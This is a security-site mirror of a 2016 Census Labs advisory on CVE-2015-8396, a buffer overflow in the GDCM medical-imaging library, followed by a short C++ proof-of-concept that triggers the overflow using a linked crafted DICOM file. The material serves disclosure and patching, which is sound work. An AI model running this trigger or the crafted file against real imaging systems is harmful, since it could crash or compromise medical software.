首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buff
来源:http://census-labs.com 作者:Tsampas 发布时间:2016-01-13  
/*
Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
images.
It provides routines to view and manipulate a wide range of image formats
and can be accessed through many popular programming languages like Python,
C#, Java and PHP.
 
GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone
to an
integer overflow vulnerability which leads to a buffer overflow and
potentially to remote code execution. The vulnerability is triggered by the
exposed function gdcm::ImageRegionReader::ReadIntoBuffer, which copies
DICOM
image data to a buffer. ReadIntoBuffer checks whether the supplied
buffer is
large enough to hold the necessary data, however in this check it fails to
detect the occurrence of an integer overflow, which leads to a buffer
overflow
later on in the code. The buffer overflow will occur regardless of the
size of
the buffer supplied to the ReadIntoBuffer call.
 
More information about this vulnerability can be found at
http://census-labs.com/news/2016/01/11/gdcm-buffer-overflow-imageregionreaderreadintobuffer/
 
The GDCM project has released version 2.6.2 that addresses this issue.
It is advised to upgrade all GDCM installations to the latest stable
release.
 
Disclosure Timeline
-------------------
CVE assignment:    December 2nd, 2015
Vendor Contact:    December 4th, 2015
Vendor Patch Release: December 23rd, 2015
Public Advisory: January 11th, 2016
*/
 
#include "gdcmReader.h"
#include "gdcmImageReader.h"
#include "gdcmImageRegionReader.h"
#include "gdcmBoxRegion.h"
#include "gdcmImageHelper.h"
 
#include <iostream>
 
using namespace std;
 
/*
 * A simple demonstration of CVE-2015-8396
 * by Stelios Tsampas (stelios at census-labs.com)
 * based on http://gdcm.sourceforge.net/html/ExtractImageRegion_8cs-example.html
 *
 * Compiles with:
 * $ g++ -I/usr/include/gdcm-2.6 -o CVE-2015-8396-trigger CVE-2015-8396-trigger.cpp -lgdcmCommon -lgdcmMSFF -lgdcmDSED
 *
 * Try it on http://census-labs.com/media/CVE-2015-8396.dcm.bz2
 *                https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39229.zip
 * $ bzip2 -d CVE-2015-8396.dcm.bz2
 * $ ./CVE-2015-8396-trigger CVE-2015-8396.dcm
 */
 
int main(int argc, char *argv [])
{
    char buffer[2048 * 2047];
    gdcm::ImageRegionReader reader;
    gdcm::BoxRegion box;
 
    if (argc < 2) {
        cout << "Usage: example <input-file>\n";
        return 1;
    }
 
    const char *filename = argv[1];
    reader.SetFileName(filename);
     
    if (!reader.ReadInformation()) {
        cout << "No info from file\n";
        return 1;
    }
 
    std::vector<unsigned int> dims = gdcm::ImageHelper::GetDimensionsValue(reader.GetFile());
    cout << "x: " << dims[0] << ", y: " << dims[1] << ", z: " << dims[2] << "\n";
 
    box.SetDomain(0, dims[0] - 1, 0, dims[1] - 1, 0, dims[2] - 1);
    reader.SetRegion(box);
    reader.ReadIntoBuffer(buffer, sizeof(buffer));
     
    return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TrendMicro node.js HTTP Server
·FortiGate OS Version 4.x - 5.0
·KeePass Password Safe Classic
·Internet Explorer 11.0.9600.18
·Amanda <= 3.3.1 - Local Root E
·SNScan 1.05 - Scan Hostname/IP
·Linux Kernel overlayfs Local P
·Konica Minolta FTP Utility 1.0
·Symantec Endpoint Protection 1
·WhatsUp Gold 16.3 - Unauthenti
·D-Link DCS-931L Arbitrary File
·SevOne NMS <= 5.3.6.0 - Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved